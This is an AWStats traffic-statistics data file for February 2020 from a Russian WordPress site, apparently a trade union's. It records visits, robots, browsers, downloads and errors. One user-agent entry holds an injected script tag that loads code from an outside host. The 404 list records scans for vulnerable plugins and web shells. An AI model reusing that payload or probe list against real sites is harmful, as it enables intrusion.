AWSTATS DATA FILE 7.0 (build 1.971)
# If you remove this file, all statistics for date 202002 will be lost/reset.
# Last config file used to build this data file was /etc/awstats/awstats.xn--g1akdbaehef3a2a5g.xn--p1ai.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 2010                
POS_TIME 2690                
POS_VISITOR 32444               
POS_DAY 51626               
POS_DOMAIN 3657                
POS_LOGIN 3891                
POS_ROBOT 4084                
POS_WORMS 4760                
POS_EMAILSENDER 4891                
POS_EMAILRECEIVER 5034                
POS_SESSION 52477               
POS_SIDER 52686               
POS_FILETYPES 5169                
POS_DOWNLOADS 5597                
POS_OS 10756               
POS_BROWSER 10898               
POS_SCREENSIZE 13357               
POS_UNKNOWNREFERER 13431               
POS_UNKNOWNREFERERBROWSER 13937               
POS_ORIGIN 14232               
POS_SEREFERRALS 14379               
POS_PAGEREFS 14563               
POS_SEARCHWORDS 14962               
POS_KEYWORDS 15114               
POS_MISC 2353                
POS_ERRORS 15173               
POS_CLUSTER 3747                
POS_SIDER_404 15359               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20200301000154 418 96218 9576520020462
FirstTime 20200201002241
LastTime 20200229204741
LastUpdate 20200301000247 13 0 12 0 0
TotalVisits 702                 
TotalUnique 377                 
MonthHostsKnown 0                   
MonthHostsUnknown 536                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 66 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 37 148 3073805 324 467 20215127
1 25 103 3259195 177 217 6622179
2 22 97 3618290 381 523 17966163
3 29 50 2867498 301 386 14236944
4 41 91 3506758 437 620 28440334
5 23 66 1692599 317 392 18242166
6 54 234 16911043 338 469 13917416
7 21 73 2617261 295 410 15163004
8 55 240 11544754 318 451 21062104
9 92 471 31897700 320 423 13936323
10 161 339 21089874 488 671 30102695
11 78 341 17163910 325 511 14201166
12 62 354 12198404 343 465 16203161
13 65 323 10664363 360 532 17238732
14 34 182 18130690 422 523 18053869
15 109 638 59839170 312 477 15129882
16 166 827 30474594 376 529 26786911
17 42 271 10292078 370 480 17286029
18 70 361 22103010 374 479 18764538
19 52 298 25448855 334 459 14802348
20 45 219 8309998 338 457 16841765
21 42 260 21295316 352 477 15245563
22 51 175 5953037 320 407 13763930
23 24 28 1653150 363 480 27304894
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 1400 6189 343629765
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 1
Legazavr 1 158 1014571 20200211163909
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 14
yandex 8049 280037712 20200229235444 1201
wordpress 832 0 20200229233819 0
mail\.ru 335 16438502 20200229214248 163
googlebot 315 22898054 20200228164614 22
bot[\s_+:,\.\;\/\\-] 297 9949466 20200228133054 54
ia_archiver 118 3403769 20200218000049 8
msnbot 104 502605 20200226171855 29
crawl 33 1158236 20200228155023 2
python 12 393882 20200224002015 0
seznambot 12 278147 20200219231455 5
no_user_agent 11 473858 20200228204736 0
favicon 6 136908 20200229163700 0
[\s_+:,\.\;\/\\-]bot 5 172127 20200212004104 1
unknown 5 335 20200220054406 5
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 19
css 1131 8444497 0 0
ttf 9 1489932 0 0
woff 1 98024 0 0
txt 2 28860 0 0
woff2 151 8333280 0 0
json 1 172 0 0
php 419 5587652 0 0
html 798 31060540 0 0
xml 4 3311 0 0
jpg 1202 117619105 0 0
doc 27 2951680 0 0
eot 5 662968 0 0
png 522 136742065 0 0
pdf 25 13398991 0 0
js 1853 11120075 0 0
docx 1 14504 0 0
Unknown 11 325452 0 0
svg 2 445209 0 0
gif 25 5303448 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 25
/robots.txt 1490 0 99830
/wp-content/uploads/2016/05/%D0%9A%D0%BE%D0%BB%D0%BB%D0%B5%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D1%8B%D0%B9-%D0%B4%D0%BE%D0%B3%D0%BE%D0%B2%D0%BE%D1%80-2015-2018.pdf 20 6 12466607
/wp-content/uploads/2019/03/12%D0%A4%D0%95%D0%92%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5.doc 18 0 3004416
/wp-content/uploads/2016/05/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D0%BA%D0%BE%D0%BC%D0%B8%D1%81%D1%81%D0%B8%D0%B8-%D0%BF%D0%BE-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%BE%D0%BD%D0%BD%D0%BE%D0%B9-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B5-%D0%BF%D1%80%D0%BE%D1%84%D1%81%D0%BE%D1%8E%D0%B7%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BA%D0%BE%D0%BC%D0%B8%D1%82%D0%B5%D1%82%D0%B0.doc 9 0 410112
/wp-content/uploads/2019/06/%D0%9A%D0%BE%D0%BB_%D0%B4%D0%BE%D0%B3%D0%BE%D0%B2%D0%BE%D1%80_2019-2021.pdf 6 0 7701678
/wp-content/uploads/2017/09/%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5-c-01.2017.doc 6 0 832512
/wp-content/uploads/2016/05/%D0%BF%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE%D0%B1-%D0%BE%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B8-2016.doc 5 0 158720
/wp-content/uploads/2020/02/%D0%9E-%D0%BC%D0%B0%D1%82%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D0%B8_2020.pdf 5 0 1255670
/wp-content/uploads/2016/05/%D0%9F%D0%9E%D0%9B%D0%9E%D0%96%D0%95%D0%9D%D0%98%D0%95-%D0%BE-%D0%BA%D0%BE%D0%BC%D0%B8%D1%81%D1%81%D0%B8%D0%B8-%D0%BF%D0%BE-%D0%BA%D1%83%D0%BB%D1%8C%D1%82-%D0%BC%D0%B0%D1%81%D1%81%D0%BE%D0%B2%D0%BE%D0%B9-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B5.doc 4 0 169984
/wp-content/uploads/2017/11/%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5.doc 4 0 655360
/wp-content/uploads/2017/04/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE%D0%B1-%D0%BE%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B8-%D0%B8-%D0%BE%D1%82%D0%B4%D1%8B%D1%85%D0%B5-2017.doc 3 0 101376
/wp-content/uploads/2019/02/%D0%9A%D0%BE%D0%BD%D1%86%D0%B5%D1%80%D1%82%D1%8B_%D0%9F%D0%9A.doc 3 0 8294400
/wp-content/uploads/2017/04/%D0%94%D0%BE%D0%BF-%D1%81%D0%BE%D0%B3%D0%BB%D0%B0%D1%88%D0%B5%D0%BD%D0%B8%D0%B5-1-%D0%B2-%D0%9A%D0%BE%D0%BB-%D0%B4%D0%BE%D0%B3%D0%BE%D0%B2%D0%BE%D1%80-1.pdf 2 0 404351
/wp-content/uploads/2016/09/%D0%92%D0%BD%D0%B8%D0%BC%D0%B0%D0%BD%D0%B8%D0%B5.doc 2 0 130048
/wp-content/uploads/2017/11/%D0%9C%D0%B5%D0%B4%D1%83%D1%81%D0%BB%D1%83%D0%B3%D0%B8.doc 2 0 158720
/wp-content/uploads/2017/03/%D0%B0%D0%BA%D1%82-%D0%BD%D0%B0-%D0%BF%D0%BE%D0%BE%D1%89%D1%80%D0%B5%D0%BD%D0%B8%D0%B5-%D1%83%D0%B2%D0%BE%D0%BB%D1%8C%D0%BD%D1%8F%D0%B5%D0%BC%D0%BE%D0%B3%D0%BE.doc 2 0 67584
/wp-content/uploads/2017/03/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D0%BC%D0%B0%D1%82%D0%B5%D1%80%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B9-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D0%B8-2017.doc 2 0 96256
/wp-content/uploads/2016/09/%D0%A5%D0%BE%D0%B4%D0%B0%D1%82%D0%B0%D0%B9%D1%81%D1%82%D0%B2%D0%BE-2016-%D0%BC%D0%B5%D0%B4.%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%BD%D0%B8%D0%BA%D0%B8.doc 2 0 125952
/wp-content/uploads/2017/06/%D0%9F%D0%9E%D0%9B%D0%9E%D0%96%D0%95%D0%9D%D0%98%D0%95-%D0%BE%D0%B1-%D0%BE%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B8-%D0%B8-%D0%BE%D1%82%D0%B4%D1%8B%D1%85%D0%B5-%D1%87%D0%BB%D0%B5%D0%BD%D0%BE%D0%B2-%D0%9F%D1%80%D0%BE%D1%84%D1%81%D0%BE%D1%8E%D0%B7%D0%B0-%D0%BD%D0%B0-2017-%D0%B3%D0%BE%D0%B4.doc 1 0 33792
/wp-content/uploads/2016/06/%D0%9E%D0%B1%D1%89%D0%B5%D0%B5-%D0%BF%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D0%BF%D0%B5%D1%80%D0%B2%D0%B8%D1%87%D0%BD%D0%BE%D0%B9-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B8-%D0%BF%D1%80%D0%BE%D1%84%D1%81%D0%BE%D1%8E%D0%B7%D0%B0-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2-%D0%B7%D0%B4%D1%80%D0%B0%D0%B2%D0%BE%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F-%D0%A0%D0%A4.pdf 1 0 268062
/wp-content/uploads/2016/05/%D0%BF%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D0%BC%D0%B0%D1%82%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D0%B8-2016.doc 1 0 35840
/license.txt 1 0 19935
/wp-content/plugins/contact-form-7/readme.txt 1 0 8925
/wp-content/uploads/2017/04/%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5-c-01.2017-%D0%9D%D0%90-24-%D0%9C%D0%90%D0%A0%D0%A2%D0%90-2017%D0%93.doc 1 0 110592
/wp-content/uploads/2016/05/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D0%BC%D0%BE%D0%BB%D0%BE%D0%B4%D0%B5%D0%B6%D0%BD%D0%BE%D0%BC-%D1%81%D0%BE%D0%B2%D0%B5%D1%82%D0%B5-%D0%9C%D0%A0%D0%9D%D0%A6-1.doc 1 0 36864
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS 9
linuxandroid 1388
winxp 320
winnt 1338
java 14
winvista 280
linux 130
win7 1885
macosx 725
Unknown 115
END_OS

# Browser ID - Hits
BEGIN_BROWSER 127
firefox28.0 23
msie6.0 23
chrome45.0.2454.85 1
firefox26.0 1
chrome80.0.3987.122 168
chrome72.0.3626.121 21
chrome79.0.3945.79 91
chrome39.0.2171.95 6
chrome31.0.1650.57 4
firefox49.0 1
chrome79.0.3945.117 245
chrome58.0.3029.110 3
msie8.0 2
firefox70.0 4
chrome77.0.3865.120 1
chrome42.0.2311.90 1
chrome80.0.3987.87 249
firefox64.0 6
firefox73.0 58
firefox59.0 1
chrome27.0.1453.93 1
msie7.0 2
chrome79.0.3945.130 498
firefox40.1 2
chrome79.0.3945.93 32
chrome32.0.1675.0 1
firefox65.0 9
chrome80.0.3987.117 80
chrome71.0.3578.141 1
chrome66.0.3359.181 5
chrome70.0.3538.102 50
safari13.0.1 33
chrome49.0.2623.112 185
chrome73.0.3683.103 4
chrome77.0.3865.116 58
safari13.0.5 212
firefox50.0 3
firefox72.0 742
firefox55.0 11
chrome76.0.3809.132 42
chrome68.0.3440.106 1
chrome63.0.3239.132 62
chrome60.0.3112.107 2
chrome77.0.3865.92 23
safari13.0 92
chrome62.0.3202.94 45
chrome80.0.3987.116 103
chrome51.0.2704.103 210
firefox68.0 1
chrome78.0.3904.97 23
chrome36.0.1985.143 44
mozilla 317
chrome24.0.1312.60 1
firefox25.0 2
chrome26.0.1410.64 3
chrome44.0.2403.157 1
chrome79.0.3945.136 498
safari12.1.1 165
firefox14.0.1 1
chrome68.0.3440.84 1
firefox60.0 1
chrome26.0.1410.63 3
chrome35.0.1916.47 2
chrome41.0.2228.0 1
safari12.1.2 1
chrome44.0.2403.133 20
firefox36.0 4
safari 24
chrome67.0.3396.87 41
safari11.0 50
chrome79.0.3945.59 5
android 2
firefox5.02 1
chrome55.0.2883.91 1
firefox52.0 62
chrome67.0.3396.79 1
chrome22.0.1229.79 1
chrome71.0.3578.98 1
opera9.80 12
chrome61.0.3163.128 50
firefox63.0 2
chrome57.0.2987.108 64
iphone 1
firefox62.0 18
chrome80.0.3987.106 105
chrome34.0.1847.116 1
chrome51.0.2704.84 1
safari13.0.4 50
chrome74.0.3729.169 32
chrome71.0.3578.99 104
chrome72.0.3602.2 1
msie9.0 11
chrome75.0.3770.142 21
Unknown 63
chrome80.0.3987.100 81
firefox11.0 16
chrome57.0.2987.137 22
chrome73.0.3683.75 1
chrome80.0.3987.99 87
chrome77.0.3865.90 4
chrome63.0.3239.111 20
safari10.0 25
chrome41.0.2226.0 2
firefox69.0 2
chrome76.0.3809.100 1
chrome73.0.3683.86 24
chrome78.0.3904.108 359
chrome41.0.2227.0 1
firefox56.0 2
chrome12.0.742.122 2
firefox67.0 2
chrome79.0.3945.88 6
nokia 1
chrome45.0.2454.94 2
chrome80.0.3987.119 36
chrome67.0.3396.99 22
chrome19.0.1084.5409 8
chrome48.0.2564.109 1
msie10.0 95
firefox5.0.1 2
chrome79.0.3945.116 65
chrome66.0.3359.170 2
chrome65.0.3325.146 1
firefox45.9 1
chrome67.0.3396.62 2
chrome64.0.3282.140 22
chrome75.0.3770.100 46
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 7
Mozilla/5.0_(compatible;_AffiliateLabz/1.0;__https://affiliatelabz.com/) 20200211023825
com.google.GoogleMobile/41.0.0_iPhone/9.1_hw/iPhone8_2 20200208083729
WhatsApp/2.20.21_i 20200212153023
Go-http-client/1.1 20200229063258
Blackboard_Safeassign 20200204160716
Mozilla/5.0_(compatible;_Dataprovider.com) 20200210041714
Mozilla/5.0_(compatible;_WebDataStats/1.0_;__https://webdatastats.com/policy.html) 20200205041834
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 4
WhatsApp/2.20.21_i 20200212153023
Go-http-client/1.1 20200229063258
Blackboard_Safeassign 20200204160716
\x22><script_type=text/javascript_src='https://slow.destinyfernandi.com/hos?&tp=3'></script> 20200210101355
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 745 937
From1 14 14
From2 146 222
From3 30 38
From4 465 4984
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 3
google 38 72
rambler 2 3
yandex 106 147
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 10
https://recipe.ru 10 10
http://go.mail.ru 9 9
http://every-lang-seo.com 6 6
http://www.facebook.net 2 2
http://baidu.com 2 2
http://adguard.com/referrer.html 1 1
http://domain.com 0 5
https://yandex.kz 0 1
https://yandex.fr 0 1
https://yandex.ua 0 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 9
403 225 81095822
206 37 1593176
400 85 85
401 19 9443
302 13 0
499 236 0
500 9 14395
301 24 0
404 457 12970721
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 255
/wp-content/plugins/easyrotator-for-wordpress/prv8.php 1 -
/ 11 -
/_input_3_vuln.htm 2 -
/wp-content/plugins/hybrid-composer/style.css 1 -
/2019/wp-login.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai//2019/wp-login.php
/wp-content/plugins/delucks-seo/modules/professional/breadcrumbs/assets/css/frontend.css 1 -
/wordpress/ 2 -
/wp-json/trx_addons/v2/get/sc_layout/ 1 -
/%D1%81-%D0%BD%D0%B0%D1%81%D1%82%D1%83%D0%BF%D0%B0%D1%8E%D1%89%D0%B8%D0%BC-%D0%BD%D0%BE%D0%B2%D1%8B%D0%BC-%D0%B3%D0%BE%D0%B4%D0%BE%D0%BC/ 1 http://go.mail.ru/search_images
/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/build.xml 2 -
/wp-content/plugins/indeed-membership-pro/assets/css/templates.css 7 -
/wp-content/plugins/formcraft/file-upload/server/php/ 5 -
/web/ 2 -
/wp1/wp-login.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai//wp1/wp-login.php
/wp-content/plugins/visualizer/js/media.js 1 -
/wp-content/plugins/themegrill-demo-importer/assets/js/admin/demo-importer.js 1 -
/wp-content/themes/rarebird/framework/plugins/revslider/js/rev_admin.js 1 -
/olux.php 3 -
/wp-content/themes/beach_apollo/advance/plugins/showbiz/js/showbiz_admin.js 1 -
/bin/keychain.php 1 -
/wp-content/plugins/duplicator/assets/css/global_admin_style.css 1 -
/wp-content/themes/Avada/framework/plugins/revslider/js/rev_admin.js 1 -
/wp-content/themes/andre/framework/plugins/revslider/js/rev_admin.js 1 -
/logs/error.php 1 -
/fckeditor/editor/filemanager/connectors/php/upload.php 2 -
/templates/protostar/index.php 1 -
/wp-content/plugins/gourl-bitcoin-payment-gateway-paid-downloads-membership/images/coins/litecoin.png 2 -
/wp-includes/users.php 2 -
/wp-content/plugins/wp-mobile-detector/cache/db.php 1 -
/wp-content/plugins/iwp-client/clipboard.min.js 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/plugins/iwp-client/clipboard.min.js
/%D0%BD%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE%D0%B4%D0%BD%D0%B8%D0%B9-%D1%82%D0%B5%D0%B0%D1%82%D1%80%D0%B0%D0%BB%D0%B8%D0%B7%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9-%D1%83%D1%82%D1%80%D0%B5%D0%BD%D0%BD%D0%B8/ 1 http://go.mail.ru/search_images
/wp-content/uploads/2018/11/seo_script.php 1 -
/%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B0-%D0%BF%D1%80%D0%B0%D0%B7%D0%B4%D0%BD%D0%B8%D1%87%D0%BD%D1%8B%D1%85-%D0%BC%D0%B5%D1%80%D0%BE%D0%BF%D1%80%D0%B8%D1%8F%D1%82%D0%B8%D0%B9-%D0%BF/ 1 http://go.mail.ru/search_images
/wp-content/plugins/formcraft/js/fcmodal.js 3 -
/098.php 2 -
/upel.php 2 -
/wp-content/themes/rarebird/framework/plugins/showbiz/js/showbiz_admin.js 1 -
/wp-content/themes/striking_r/framework/plugins/revslider/js/rev_admin.js 1 -
/wp-content/themes/medicate/script/revslider/js/rev_admin.js 1 -
/%D0%BE%D1%82%D0%B4%D1%8B%D1%85-%D0%B2-%D0%BA%D1%80%D1%8B%D0%BC%D1%83/ 1 http://go.mail.ru/search_images
/test/ 2 -
/%D1%8D%D0%BA%D1%81%D0%BA%D1%83%D1%80%D1%81%D0%B8%D1%8F-%D0%B2-%D1%85%D1%83%D0%B4%D0%BE%D0%B6%D0%B5%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D1%8B%D0%B9-%D0%BC%D1%83%D0%B7%D0%B5%D0%B9-%D0%BC%D1%83%D1%81/ 1 http://go.mail.ru/search_images
/wp-content/plugins/profile-builder/assets/css/style-front-end.css 6 -
/wp-content/plugins/cherry-plugin/languages/cherry-plugin-blank.po 1 -
/%D0%BC%D1%83%D0%B7%D0%B5%D0%B9-%D0%B7%D0%B0%D0%BF%D0%BE%D0%B2%D0%B5%D0%B4%D0%BD%D0%B8%D0%BA-%D0%B0-%D0%BF-%D1%87%D0%B5%D1%85%D0%BE%D0%B2%D0%B0-%D0%BC%D0%B5%D0%BB%D0%B8%D1%85%D0%BE%D0%B2%D0%BE/ 2 http://go.mail.ru/search_images
/wp-counts.php 1 http://www.facebook.net/
/wp-content/themes/pindol/revslider/js/rev_admin.js 1 -
/3-%D0%BF%D1%83%D1%82%D0%B5%D0%B2%D0%BA%D0%B8-%D0%B2-%D0%B4%D0%B5%D1%82%D1%81%D0%BA%D0%B8%D0%B9-%D1%81%D0%B0%D0%BD%D0%B0%D1%82%D0%BE%D1%80%D0%B8%D0%B9-%D0%B7%D0%BE%D1%80%D1%8C%D0%BA%D0%B0/ 1 http://go.mail.ru/search_images
/administrator/ 1 -
/%D0%BE%D1%82%D0%B4%D1%8B%D1%85-%D0%B2-%D0%B3-%D1%8F%D0%BB%D1%82%D0%B5/ 1 http://go.mail.ru/search_images
/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/build.xml 2 -
/wp-content/plugins/wp-central/readme.txt 4 -
/wp-content/plugins/profile-builder-pro/readme.txt 1 -
/wp-content/themes/mantra/admin/upload-file.php 2 -
/wp-content/plugins/wp-inventory-manager/themes/css/default-theme.css 1 -
/wp-content/plugins/showbiz/js/showbiz_admin.js 1 -
/%D0%BD%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE%D0%B4%D0%BD%D0%B8%D0%B9-%D0%BF%D1%80%D0%B0%D0%B7%D0%B4%D0%BD%D0%B8%D0%BA-%D0%B2-%D0%B4%D0%BA-%D1%84%D1%8D%D0%B8/ 1 http://go.mail.ru/search_images
/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/js/rev_admin.js 1 -
/validate.php 1 http://www.facebook.net/
/wp-content/plugins/strong-testimonials/templates/modern/content.css 4 -
//index.php/wp-json/articulate/v1/upload-data 1 -
/wp-content/plugins/wp-private-content-plus/css/wppcp-front.css 1 -
/%D0%B4%D0%B5%D0%BD%D1%8C-%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D1%8C%D1%8F/ 1 http://go.mail.ru/search_images
/wp-content/plugins/themegrill-demo-importer/assets/css/demo-importer-rtl.css 1 -
/upload.php 4 -
/wp-content/plugins/profile-builder-pro/assets/css/style-front-end.css 7 -
/%D0%B6%D0%B8%D0%BB%D1%8C%D0%B5-%D0%B2-%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82/ 1 http://go.mail.ru/search_images
/wp-content/themes/twentyeleven/searchreplacedb2.php 1 -
/wp-content/vuln.php 3 -
/wp-content/plugins/ubh/ 3 -
/index.php/wp-json/articulate/v1/upload-data 1 -
/wp-content/plugins/vwcleanerplugin/bump.php 3 -
/wp-admin/output.php 1 -
/ix-%D1%81%D0%BF%D0%B0%D1%80%D1%82%D0%B0%D0%BA%D0%B8%D0%B0%D0%B4%D0%B0-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2-%D0%B7%D0%B4%D1%80%D0%B0%D0%B2%D0%BE%D0%BE%D1%85%D1%80%D0%B0%D0%BD/ 1 http://go.mail.ru/search_images
/wp-content/plugins/themegrill-demo-importer/readme.txt 1 -
/wp_admins_list.txt 1 -
/new_license.php 2 -
/wp-config_2.txt 1 -
/tmp/ 2 -
/wp-content/plugins/profile-builder/readme.txt 2 -
/wp-admin/network/wp-footer.php 3 -
/license.php 2 -
/wp-content/plugins/apikey/f0x.php 2 -
/wp-admin/shapes.php 3 -
/wp-content/plugins/sfwd-lms/wpml-config.xml 1 -
/ads.txt 3 -
/wp-content/plugins/upspy/ 4 -
/searchreplacedb2.php 8 -
/cli/update_cron.php 1 -
/%D0%B3%D0%B5%D0%BB%D0%B5%D0%BD%D0%B4%D0%B6%D0%B8%D0%BA-%D0%B0%D0%B2%D1%82%D0%BE%D0%B1%D1%83%D1%81%D0%BD%D1%8B%D0%B9-%D1%82%D1%83%D1%80/ 1 http://go.mail.ru/search_images
/wp-json/wpshopify/v1/settings 3 -
/wp-content/plugins/yuzo-related-post/assets/js/admin.js 1 -
/%D1%80%D0%BE%D0%BC%D0%B0%D0%BD%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B0%D1%8F-%D0%BA%D0%BE%D0%BC%D0%B5%D0%B4%D0%B8%D1%8F-%D0%B0%D0%BD%D0%B3%D0%B5%D0%BB-%D0%B8%D0%B7-%D0%B1%D0%B0%D0%B2%D0%B0%D1%80/ 1 http://go.mail.ru/search_images
/avtogear_ru_cron_k.php 2 -
/up.php 4 -
/cli/finder_indexer.php 1 -
/wp-content/plugins/ppus/up.php 2 -
/wp-content/plugins/downloads-manager/img/unlock.gif 2 -
/includes/defines.php 1 -
/wp-content/plugins/wp-symposium/server/php/JHxmdBheDoclez.php 1 -
/wp-content/themes/gaukingo/db.php 1 -
/components/com_banners/controller.php 1 -
/wp-content/plugins/iwp-client/readme.txt 1 http://www.facebook.net/
/%D0%B2%D0%B8%D1%82%D1%8F%D0%B7%D0%B5%D0%B2%D0%BE-%D0%B3%D0%BE%D1%81%D1%82%D0%B5%D0%B2%D0%BE%D0%B9-%D0%B4%D0%BE%D0%BC-%D0%BB%D0%B8%D0%B7%D0%B0/ 1 http://go.mail.ru/search_images
/wp-content/plugins/category-page-icons/css/menu.css 2 -
/temp/ 2 -
